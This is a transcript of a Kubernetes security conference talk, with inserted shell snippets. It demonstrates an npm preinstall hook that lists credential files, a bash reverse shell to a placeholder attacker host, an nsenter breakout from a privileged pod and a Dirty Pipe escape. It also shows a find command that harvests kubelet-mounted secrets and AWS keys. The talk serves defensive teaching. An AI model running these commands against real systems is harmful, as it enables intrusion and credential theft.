Okay. Hello and welcome. There's still space, incidentally; there's probably another 20 seats if you want to let a few more people in. Okay, we'll see how we go. Hello and welcome. Thank you very much for coming to this talk. This is one of the most packed rooms I've ever delivered to. I really appreciate you attending when there are so many other high-quality talks going on in this slot. Thank you. I will do my best to complete everything in 35 minutes. So I am Andy, I'm CEO at Control Plane. We do cloud native security engineering. We're very heavily invested in training and the community; we work in TAG Security and everything to do with the CNCF, OpenSSF and open source, and we're very proud advocates. I have done various things. I've written a book, which you will hear a little bit about today. There is a SANS course involved. My excellent colleagues also participate in a lot of training, and we'll see links to those things too. And this is my pre-eminent co-author, Mr. Michael Hausenblas, Solutions Architect at AWS. Together we wrote the book Hacking Kubernetes. It is available as a free download, the first half as a PDF on the Control Plane website, and I will give you a whistle-stop tour of what we have inside it. So what will we talk about today? Well, it's just a lot of demos, and I will do my best to ensure they work. I'm wired in, so the demo gods at least don't have the ethereal Wi-Fi to contend with. We'll start off looking at how the supply chain gets us into a cluster. We will look at what to do once we're inside the cluster. We'll demo a container breakout by kernel exploitation with Dirty Pipe, and we will look at how to take over a cloud account. There is so much prior art in this space. Thank you to everybody who has participated, open sourced, spoken and written about these things. We stand on the shoulders of giants, and these are just a few of the luminaries who have inspired me and my colleagues to go on this journey.
So what happens when Kubernetes gets deployed? The security team normally panics, and that's because somebody like Captain Hashjack is all up in their clusters. Captain Hashjack is our 8-bit adversary. We're going to threat model an attack on these clusters; this is the person we're terrified of in this instance. But this talk is called a treasure map. Why is there a treasure map involved? Well, because from the inside of a pod, this is what you might want to look at to try and break out. This is a guide to how we manually pen test pods: the microcosm of Linux inside a container. There's nothing here that is not publicly documented or well known, but it helps to enumerate the ideas as we think about exactly where we go from point to point in order to break out of a container. Looking for misconfiguration, looking for vulnerabilities, looking for anything that can allow us lateral movement, pivoting, or a way to further our attack. Okay, so before we begin: for any sensible system, we look to implement controls to defend against our attackers. Who are our attackers is the important question. In this case, we will model with Captain Hashjack. Why is this? Well, first of all, we want to understand their capabilities: what could they potentially do to us? And by extension, their intentions: why would they want to do these things? This is the process of threat modeling. It is a personal passion and crusade of mine to ensure that threat modeling becomes part of the infrastructure deployment process. We've seen this in application security, where it's a more established process. If this is of interest to you, TAG Security are doing a lot of work in this space. When a project goes through graduation in the CNCF, it undergoes an audit with TAG Security, and we look at the security properties: what's it supposed to do, what happens in the case of compromise. Which makes it easier to deploy controls.
I'll give you a whistle-stop tour of what that looks like. If you're interested, there is plenty of work going on, and we're a very open and welcoming community; there's plenty more on the website. So, the adversarial matrix. If somebody is going to attack us: who are they, what do they want, and how will they do it? We start off with a casual vandal, a script kiddie, perhaps a younger version of myself, just interested to know what happens when you port scan restricted ranges and find open, insecure things. There may not be malicious intent, but there may be malicious side effects from misunderstanding or general tinkering. Generally, we should not get pwned by somebody of this description, because if there is a public CVE available for it, or Metasploit or another security tool is able to run an automated scan and exploit it, well, we should be doing that ourselves to ensure that no drive-by attacker has easy access to our systems. We have motivated individuals, but as we progress, we're more concerned with insiders. A finger-in-the-air guess is that a major organization has at least one insider for roughly every 40,000 employees, working for another organization, potentially another nation state. Things get worse when we look at cloud services insiders, of course, because we have to trust something. We trust our operating systems. We trust the providers of the public certificates, our root certificate authorities, for internet encryption, our TLS, et cetera. We trust our hardware providers. We have to trust our cloud service providers to some extent, and we've seen in cases like the Capital One breach that inside information can lead to a more devastating impact for customers. But what we actually care about here, in Captain Hashjack's case, is the organized crime syndicate: potentially state affiliated or sponsored, but not directly linked. These individuals or groups have very wide-ranging capabilities.
We've seen a lot of ransomware kick off in the last few years. Cyber insurance has become very expensive because these groups are talented. They're targeted, but they will also use drive-by attacks, so we do have the ability to raise the bar and ensure that we test our configuration and do not get pwned. Right. So, into demos very soon. Attackers think in graphs; defenders think in lists. What does this mean? Well, a defender has to tick every single line on their checklist to make sure that there is no chink in the armor, no vulnerability, no open door in the castle. Whereas an attacker just has to pivot through various things. They land somewhere, they observe the visible horizon, and they go for the next thing. If that doesn't work for them, maybe the third thing works; it's another foot forward into the system. So we have to be mindful that there is a different mindset between the attacking and defending perspectives. This is where we get to attack trees. These give us a view of how we might pivot through a system, and then, by extension, they give us an opportunity to cut the branches of the tree with specific controls. They give us a visual representation of the security of our system, or the supposed security of our system. This is one from the financial services user group. Again, we do this for O'Reilly; there's a lot of open source material around this. My excellent colleague Lewis Denham-Parry did a fabulous talk on this yesterday. I strongly recommend you go back and watch it. It was one of the funniest and most insightful talks on threat modeling it's possible to give, and it's a very strong recommend. So how do we do cloud native security? Threat models are great, but it's time to get our hands dirty. Let's rock and roll. Okay. So, code-to-cloud attack patterns. This is from the Kubernetes documentation. We begin with the code. This is where our business value is delivered. This is what developers change frequently. This is where remote code execution might occur.
If we have a web-facing socket, a web server serving either some static content or some dynamic application, there is the opportunity for untrusted code to execute in the context of our process. We're running a process in a container; if we receive data from outside that's not handled correctly, we get remote code execution. We've seen this in various different flavors. Log4j, the Log4Shell attack: classic remote code execution. Passing a string, executed in a context that was unexpected by the server, security side effect. So the first thing we need to do is get remote code execution. Now, there is another way to do this, and that is the supply chain. We've heard so much about why the supply chain is dangerous, but let's exploit it quickly. So: everything is software, supply chain explained like I'm five. When we produce software, someone else consumes it, and we have a chain of producers and consumers. This means that an open source software developer is implicitly part of the supply chain of all of our software, but anything that they consume is also part of this consumer-producer, transitive, difficult-to-reason-about dependency graph. So what we're looking at here is Alice, Bob, Charlie, production. If we can insert malicious code into the dependency graph of a supply chain, we can run our own code on someone else's hardware, and on someone else's Kubernetes cluster very specifically. How do we attack? Well, we can do it in lots of different ways. We can get into the source code; we can infect the supplier, which is a very popular way of doing things recently, especially when we see things like Okta, another supply chain attack, where in that case a help desk provider was the one compromised; or we get into the runtime environment. Oh, wonderful. Let's try that again. I seem to have lost control of ratbags. Oh, wonderful. Everything's frozen. So this will be an interesting reboot. I will continue from my phone while I restart the machine. Okay.
So, just in time for the supply chain. What we're going to see in this next demo is npm, the JavaScript registry. What we have there is many small, decomposed packages. JavaScript pushes this idea because the decomposition of packages is supposed to be an easy way to build and reuse code. (He says: just going to reset this again. Maybe you could get the slides up and we can try that way.) What this means with npm is that we have a huge proliferation of open source packages. Now, specifically with npm's package.json, we have the ability to define a preinstall hook, and that preinstall hook allows us to execute code. In this case, what that code will do is enumerate the contents of our local file system. When we're installing a package, we're installing with the permissions of the user doing the execution; in this case, that will be me. What that means is that the contents of my local file system are available (wonderful, 112) for enumeration by anything that can execute in that environment. This is awfully good fun. (That's not the right password for this machine.) What do I have in my local environment that would be of interest to an attacker? (This would also be interesting. That's got the right configuration up.) Those things include my SSH keys, my GPG keys, any AWS or gcloud tokens I have. If I'm using OAuth or OIDC, I get a session token that is also stored on my local file system. That is what the demo will look like ever so shortly. Okay, it looks like we might almost be there. So what we are about to see is an npm supply chain attack. (That's not it. Wowsers. Okay, we are there. I think maybe, possibly, this will work. The demo gods, man, I feel they crucified me this time.) All right, so what are we going to do? Let's have a look at the package.json.
Okay, here we see our scripts: a preinstall hook called xfil. The danger here, of course, is potentially exfiltration. Let's do an npm install of this package. I'm not hosting this on the public registry, of course, because it would be taken down. What happens? What exactly happened there? Something is not on the registry. What have I done? Oh, sorry, install here, not i. Okay, finally. This is now executing my preinstall hook. If I pull this down without reading the source code, we are essentially piping to bash. At this point, I have enumerated the contents of my local file system. These are SSH keys. I can install miners. Okay, and with this timing, I'm going to move on a little bit quickly. So what just happened, I hear you ask? We pulled something from a public registry, we didn't read the source code before installing it, and it was able to execute its own untrusted code in the context of our application. (It must have been this slide. Okay, so that was what I was explaining.) Right, so we ran this backdoored open source package; the preinstall hook abuses its privilege; profit. So what could this actually look like end to end, with this remote code execution running? Down at the bottom here, we insert the malicious code into a target library. We're talking about npm here, but we can do this for any application package. Once that gets built into developer code and is running in our Kubernetes clusters, we can fire a reverse shell. A reverse shell busts outwards through a firewall: instead of me SSHing onto a server, the server connects back to an open port that I have on a public IP somewhere. And this is when Captain Hashjack, in his nefarious sailboat there, is able to get access to our systems. So how do we fix this? Well, we probably want to have 2FA on every type of token that we use; plaintext credentials, of course, are easily reusable. We see these attacks more against crypto wallets because, of course, that's easily fungible, I guess, or transferable value.
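That demo can be sketched as a tiny, self-contained mock-up. The package name (evil-pkg) and script name (xfil.sh) are invented for illustration, and this version only lists likely credential locations rather than exfiltrating anything; the mechanism itself, arbitrary shell run by npm's preinstall lifecycle hook before anyone reviews the package code, is the real one from the demo.

```shell
# Build a minimal backdoored npm package in /tmp (names are hypothetical).
mkdir -p /tmp/evil-pkg && cd /tmp/evil-pkg

# The "preinstall" script runs with the installing user's permissions,
# before any of the package's actual code is ever looked at.
cat > package.json <<'EOF'
{
  "name": "evil-pkg",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "sh ./xfil.sh"
  }
}
EOF

# The hook: here it merely enumerates likely credential locations.
cat > xfil.sh <<'EOF'
#!/bin/sh
ls -la ~/.ssh ~/.aws ~/.config/gcloud 2>/dev/null
EOF
chmod +x xfil.sh
```

Running `npm install /tmp/evil-pkg` from any project would then execute xfil.sh as you, which is the entire attack.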
And signing provides some value there. Okay, so now we'll move on to the supply chain reverse shell. This is the concrete example of the previous idea. So Captain Hashjack wants to put his code into our dependencies, and we get those running in production. This is the reverse shell idea. We start with attacking the victim's machine. We're running code in their context that they do not expect. We get a reverse TCP connection, so this busts outwards through a firewall. This is also the Log4j problem: unless our firewalls are monitoring or are restricted, which is not always the case and is difficult to do, we can get to a potentially unknown external location. This is the TCP version of the attack; there's a DNS version as well, of course, and there are other slightly more nefarious ways to do it, but it's very difficult to block. So, similar to before, we will use this malicious backdoored image in a public container registry. That will be run inside our cluster, and this will then fire the reverse shell, which we catch, courtesy of Duffie, one of the SIG-Honk luminaries. We will also exploit a misconfiguration in there: if we run this, we bust out and root the node that the container is running on, because, as you can see, we're using hostPID and privileged, and this is why that is bad. Okay. So now we go into... right. In classic British Blue Peter style, here is one I prepared earlier. You may not believe me, judging by the previous talents. All right. So what are we going to do? First of all, we're going to bounce through a public endpoint called ngrok. What we're doing here is getting a free IP on the public internet with a port. At the bottom here (probably a little large), we see a log of what's going on. And at the top here, we are going to run... which version are we on? I guess, definitely the more recent. We're going to run this. So we'll run a reverse shell.
This is the location of the IP and the port that we're going to fire back to. The deal with reverse shells is that bash contains a virtual /dev/tcp endpoint, which is really easy to hook a shell up to and get this reverse shell action; it's probably one of the worst decisions in the history of computing. And at this point, we're just going to deploy something malicious. So this will look a little bit like... cool. Maybe it is the other one then. Or possibly I've got it. That is actually nice. Okay. Let's try the other version of this. So that worked. What we're seeing here is the reverse shell catcher. Boom. That's a great relief. Cheers. Okay. So what we've seen there is that we've deployed this malicious image with a poorly configured security context, and this has bounced through that public IP back to me, standing waiting for it. I've now got a connection into that pod's shell. At this point, the pod is running as root; obviously, that's a horrendous idea. Are we privileged? Well, what's the contents of /dev? We can see everything. So at this point, we can escalate and mount the host file system using an nsenter attack. Let's just have a look at that quickly. So nsenter is "namespace enter"; everything, in Linux terms, is a namespace. And we're going to jump in. At this point, we can now see the contents of /root on the host, because we've mounted in... he says... yes, there we go. So that's the host file system, and we can also see the host process table. Wonderful. Those are all things we should never be able to see from inside a container, but of course, because we've entered those host namespaces, we've broken the abstraction. All right, let's keep moving. So what did we just see? We saw that a malicious image that was pushed to a public location was then used to run in production. When it ran, it fired that reverse shell back to a place that I controlled, and that gave me access to the pod from outside.
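The two moving parts of that demo look roughly like this. The host and port are placeholders, shown here only as strings; only ever point such things at infrastructure you own.

```shell
# Placeholder attacker endpoint (e.g. a free ngrok tunnel in the demo).
ATTACKER_HOST="attacker.example.com"
ATTACKER_PORT="4444"

# 1. The classic bash reverse shell: /dev/tcp is a virtual device built
#    into bash, so the pod dials outwards through the firewall to a
#    listener (caught with something like: nc -lvnp 4444).
REVSHELL="bash -i >& /dev/tcp/${ATTACKER_HOST}/${ATTACKER_PORT} 0>&1"

# 2. From a privileged, hostPID pod, nsenter joins the namespaces of
#    PID 1 on the host: mount, UTS, IPC, network and PID. That is a
#    full node takeover, the "broken abstraction" from the demo.
BREAKOUT="nsenter --target 1 --mount --uts --ipc --net --pid -- bash"

echo "$REVSHELL"
echo "$BREAKOUT"
```

The nsenter step only works because the pod's security context grants hostPID and privileged, which is exactly the misconfiguration called out above.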
At that point, again, it's observing the visible horizon, escalating, continuing to see: are there data stores, is there private information, are there keys, are there quant algorithms that I can steal? It's a bad day when someone has that initial foothold, the remote code execution inside your systems, because then more nefarious things can happen. Okay. So if that wasn't stressful enough, we will now try a kernel exploit. It's not a container escape; it's a process that wants to be free. Courtesy of another SIG-Honk luminary. Okay. So what is a container escape? In a container, we're sharing a kernel. A virtual machine bootstraps the BIOS; it emulates the full end-to-end bootstrap of a system, which is why it's slower. It's also a different security model, because it's using things like hardware extensions, and it traps instructions that go down to the CPU and handles them slightly differently depending on context. It can be more secure; there have been escapes from everything, and nothing is entirely secure. The compromise we make with a container is that, in order to run very quickly and to bin pack many containers onto one host, we start a process on a running kernel. So we're sharing a single kernel amongst all the processes on a host. This allows us to start very quickly, but it changes our security model, and as we see in this case, those host resources should be protected. They shouldn't be available. The point of containerization or virtualization is to abstract those away and not make them available. Now, many people have said containers are not a security boundary. Well, many things are not a security boundary, but in real-world practical use, that is unfortunately what we find ourselves with.
So while they're not a security boundary, save for maybe the very highest level of data classification, they can certainly be more secure than VMs, because we run a single process per container and then we have the opportunity to apply granular, fine-grained, process-level controls: seccomp, AppArmor, SELinux, our standard suite of capabilities that come with Linux and the extended controls that come with Linux, instead of running everything in one monolithic virtual machine. Everything is down to use case and configuration. Micro VMs provide an intermediate version of this, where we get some level of hardware abstraction with a very fast boot-up and still OCI compliance. This is a list of recent container vulnerability escapes (it's been a busy year), courtesy of Kris Nóva. Again, this is where the contention lies. The kernel is not a security boundary, but then really the CPU is not a security boundary either, as we've seen. Are we going to just decompose everything onto computers under people's desks like we used to? No, we still have to move with the times, so there is some nuance here. This is the view of namespaces. I won't go into this too much more, but suffice to say we are sharing a local network between our container workloads in a pod. The cgroup, mount and process namespaces should be individual, but then we share the storage, the network and a couple of other things. There's plenty more on this in the book. cgroups v2 come with some better security features. They work in a different way to cgroups v1; they're really hyper-complex, but provide a lot of utility. cgroups v1 are very escapable. On to Dirty Pipe. This is the CVE that was dropped with about a week's notice, which is not much time for people to patch systems. It is a dirty page vulnerability, which means it permits the injection of code into process memory that is owned by root.
An untrusted user can scribble some instructions, stick them into a piece of code that root is going to run, executable memory, and root will run those things. If the code that we stick in there is another reverse shell, back to where we're sitting on the same box, we have root access to the box by virtue of this escape. It's got a specific nuance or foible, which is that you can't write the first few bytes. So what this exploit does, courtesy of my friend and colleague James Cleverley-Prance, is use the /proc/self/exe attack: it writes a small piece of assembly to build something smaller than 4K, which fires this reverse shell back. Okay, let's break out of a container. So this is all virtual machine-based. Let's just... oh, sorry, one second. Get out of there. Okay, so as you see, we will... okay, this is actually provisioning a Vagrant box, so that might take one second. This reverse shell concept is kind of fundamental to a lot of attacks, because it's really very useful. What we're doing is we start the container, we open our socket, waiting as the unprivileged user for root to connect back to our reverse shell, but instead of going across the internet, we're just using the primary network adapter of the host. And this is because in this case we're not firewalling... we're not preventing network traffic between the container network, across the container bridge, onto the primary adapter of the host. Sweet. All right, so what have we got here? First of all, let's check the kernel version. We're on a vulnerable kernel. Excellent. Let's go and have a look at what we've actually got in terms of code. We have runcsmall.nasm. So ultimately here we are using the ELF header, and we'll ignore most of this, but what we care about is that this is our good old reverse shell.
We're going to insert this base64 code into the runc binary, un-base64 it, and it looks like that: /dev/tcp again, the same reverse shell as before. And with any luck, off we go. Okay, so we have built the thing; now check who we are. We are vagrant, an unprivileged user, and let's run this. Okay, so we're now listening. We have executed, and I will just check that it connects back to me. Oh, there we go. Wonderful. So we're now root. What's happened there is that by running this exploit and injecting this code, we've fired that reverse shell back, and interestingly, it's dumped us into the file system location that the mount namespace was mounted from. Of course, a container and the processes inside it have to exist on the host. We're running on a shared kernel, but we paint this picture for the container that says: you can only see what the kernel wants you to see; in this case, you're the only special process running on the host. Here, now that we've broken out, we can see that the abstraction has been shattered, and we've dropped into the containerd runtime location where this image is, and we can see the contents of the image itself. What is the... oh, where perhaps? What is the upshot of this? Well, at this point we have got access to, for example, the kubelet, and we can root the whole system. So the idea here, really, is to use the container, cloud native paradigm of constantly rebuilding, having fast deployment pipelines, and using our CI/CD to ensure that we're always on the latest image. But this is a kernel vulnerability, so it's in the host system; it's the same thing. Our AMI bakery or our VM golden image should have a well-oiled pipeline so that we can ship patches as soon as they arrive, in this case as quickly as is necessary. Okay, so we are now out on the host. We've broken out of the container and we sit on the host file system. What do we want to do next? Attack the kubelet. Here is a high-level view.
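As a rough triage aid, the "are we on a vulnerable kernel" check from the start of that demo can be sketched as follows. Dirty Pipe (CVE-2022-0847) affects kernels from 5.8 onwards and was fixed upstream in 5.16.11, 5.15.25 and 5.10.102; distribution kernels backport fixes, so treat a "yes" here as "go and read your vendor's advisory", not a verdict.

```shell
# Rough Dirty Pipe (CVE-2022-0847) triage on upstream version numbers.
dirty_pipe_maybe_vulnerable() {
  ver="$1"                              # e.g. "5.10.90"
  major=$(echo "$ver" | cut -d. -f1)
  minor=$(echo "$ver" | cut -d. -f2)
  patch=$(echo "$ver" | cut -d. -f3)
  patch=${patch:-0}                     # tolerate two-part versions
  [ "$major" -eq 5 ] || { echo no; return; }
  [ "$minor" -ge 8 ] || { echo no; return; }   # introduced in 5.8
  case "$minor" in
    10) [ "$patch" -lt 102 ] && echo yes || echo no ;;  # fixed 5.10.102
    15) [ "$patch" -lt 25 ]  && echo yes || echo no ;;  # fixed 5.15.25
    16) [ "$patch" -lt 11 ]  && echo yes || echo no ;;  # fixed 5.16.11
    *)  [ "$minor" -le 16 ]  && echo yes || echo no ;;  # other 5.8-5.16
  esac
}

# Check the running kernel (strip any "-generic" style suffix first):
dirty_pipe_maybe_vulnerable "$(uname -r | cut -d- -f1)"
```

This is exactly the argument made above about AMI bakeries: the fix is not in the container image but in the host kernel, so the patch pipeline for nodes has to be as well-oiled as the one for workloads.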
We can see that various things from the node's root are exposed to the node user, and by that we're talking about the workload that's running there. So what do we see? Well, we've got the container runtime, the storage, the orchestrator-injected environment variables, and the secrets and config maps. Now, again, everything that's mounted into the container must exist on the host, and one of those things is secrets. When secrets are pulled from the Kubernetes API by the kubelet, the API will verify that the node is running the workload that is authorized to pull those secrets. You can't just enumerate everything, as long as node authorization is correctly configured. So in this case we are going to, from the kubelet host (so we've rooted the node), enumerate the file system, find out where the service accounts are, and exploit the stolen service accounts. He says: let's get out of there. This is supposed to be set up beforehand, I apologize. There we go. All right, so let's make sure that everything is clean. That is how the sausage is made. Maybe I'll just finish it here. So in this case we've already achieved an exploit of the host system, so instead of reusing the same container, I'm just going to move into the next system here, and networking may be problematic. We're getting there. Sweet. Okay, we're there. So when I pentest systems, I drop in my own special set of tooling, and that's where it is. My local shell configuration is now up on this host. So I'm on a GKE node. I've rooted the node, because we saw in the last attack that we can get out that way. So let's just... all right, I'm root on the node. We've had our reverse shell supply chain attack. We've attacked the kernel and broken out onto the host. So we're now on the kubelet's node. What can we do from here? Well, let's have a look at this alias. What will this do? Okay: ksecrets, filesystem dump.
It looks in /var/lib/kubelet/pods for everything Kubernetes, either volumes or projected volumes, because bound service account tokens, which are the newer way of attaching claims (audience, expiry) to a service account token and are strongly recommended, exist in these locations. And then we'll have a look for things like namespace, token or certs. Let's just have a look at what is in that directory that we're enumerating. Don't forget, we are the root user. The root user is omnipotent, omniscient; they can do everything on the host, because they must be able to debug and turn things on and off as necessary. So we're exploiting something that is by design, but we're going under the covers. Let's see what's there. There are plenty of things, and it's not really that visible, so let's try once more. Okay, so we can see that we've got lots of certificates and keys and all this kind of thing. But what are we actually looking for? Well, if we look for secrets that are mounted in that are not RBAC secrets, that are not service account tokens (whoops), we have got a potentially undeployed thing. Let's just have a double check as to why that's not working. Okay, because the network went down at that point. Okay, let's try that again. Okay, so we've got some AWS keys that have magically appeared. Wonderful, thank you, configuration. So what does this mean? This means that an automated operator or some process inside the cluster needs these keys to do a thing. Maybe it's a special version of autoscaling. Maybe it's to run Terraform. Maybe it's to deploy S3 buckets in an ad hoc fashion, or some other crazy version of that. So what can we do with these? Well, potentially we can escalate to the cloud account. We're using these stolen service accounts, but in this case they're service accounts for AWS itself. Okay. So: don't multi-tenant data classifications. This is my favorite view of kubelets.
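The ksecrets alias from the demo boils down to a find over the kubelet's pod directory. A sketch, with the path parameterized so it can be pointed at a test tree; on a stock node the default is /var/lib/kubelet/pods, and the exact alias in the demo may differ:

```shell
# ksecrets sketch: every secret mounted into a pod also exists on the
# host under the kubelet's pod directory. Secret volumes live under
# volumes/kubernetes.io~secret, and projected volumes (where bound
# service account tokens land) under volumes/kubernetes.io~projected.
# Root on the node can read all of them.
ksecrets() {
  root="${1:-/var/lib/kubelet/pods}"   # stock kubelet default
  find "$root" \
    \( -path '*/volumes/kubernetes.io~secret/*' \
       -o -path '*/volumes/kubernetes.io~projected/*' \) \
    -type f 2>/dev/null
}

# On a real node this lists token, ca.crt, namespace files and any
# mounted application secrets; elsewhere it simply prints nothing.
ksecrets || true
```

The interesting finds are exactly as described above: files that are not the standard token/ca.crt/namespace triplet, such as an operator's AWS credentials.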
If you put sensitive and unsensitive data on the same cluster, the unsensitive data will be less well secured in our threat model, and if we can break out onto the host, we can potentially get access to the more sensitive data. So, cloud account takeover: this is ultimately what happens. No operators were hurt in the making of this GIF. What are we going to do? We're going to exploit those stolen credentials. That's not the one we want; let's use this one. Okay, so we've got those credentials. What can we do with them? Let's get off those hosts, because we've now stolen them. Right, we are going to pwn the AWS account that those keys belong to, because why not? We've got access to them. Uh-oh. This is a canary token. That means that the owner of this token has been notified that this token, which was left like a honeypot in the cluster, has been used. It should never be used, because it's not a real token, but it's left there in order to tempt an attacker like Captain Hashjack to enumerate and explore what it is. All I've done there is try to identify my caller identity. It's a simple call to understand: what's the name of this thing? Could it give me further permissions? Instead of just brute-forcing every permission set, I want to do a targeted check: maybe it's S3-related, maybe it's got IAM permissions. But a canary token will go off like a Christmas tree, like an alarm bell. These are scattered across everything that I've ever touched: my infrastructure, my local machine. It's a way of making sure that, in the event of our preventative controls failing, or the things that we rely on and trust, like the kernel, like our cloud provider, failing underneath us, we still have a detective element that allows us to understand that we've been breached. Okay, where am I? Okay, so what's next?
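On the defensive side, planting such a tripwire is cheap. This sketch writes a canary AWS credentials file; the key pair below is a fabricated placeholder, since in practice you would mint one from a canary token service so that any use of it notifies you. The attacker's probe is shown as a string, since running it needs the aws CLI and a real key.

```shell
# Drop a canary credentials file somewhere tempting (a cluster secret,
# a home directory). The key pair here is a made-up placeholder; a real
# canary comes from a canary token service and alerts on any use.
cat > /tmp/canary-credentials <<'EOF'
[default]
aws_access_key_id = AKIAIOSFODNN7CANARY0
aws_secret_access_key = ThisIsNotARealKeyItIsATripwire
EOF

# The attacker's first "quiet" probe, exactly the call that tripped the
# alarm in the demo: a cheap identity lookup before targeted checks.
PROBE='aws sts get-caller-identity'
echo "$PROBE"
```

Because the canary key has no legitimate consumer, the very first STS call against it is a high-fidelity breach signal, which is why they work even when preventative controls have already failed.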
There are lots and lots of different ways to be breached in a Kubernetes system, from the application workloads all the way through the cluster configuration and deployment. Once again, this is where our pod attack map comes in handy. By thinking about how we logically enumerate these things, we don't need to just run tooling that's very loud and noisy; we can instead be more selective. Container security tooling will alarm or alert when unusual or non-standard behavior (that's what I'm looking for) fires off, so taking a more structured approach is a stealthier, more silent way of doing it. This is what Control Plane does for a living. If you're interested in these things, please do come and talk to us. And with that, thank you very much for your attention.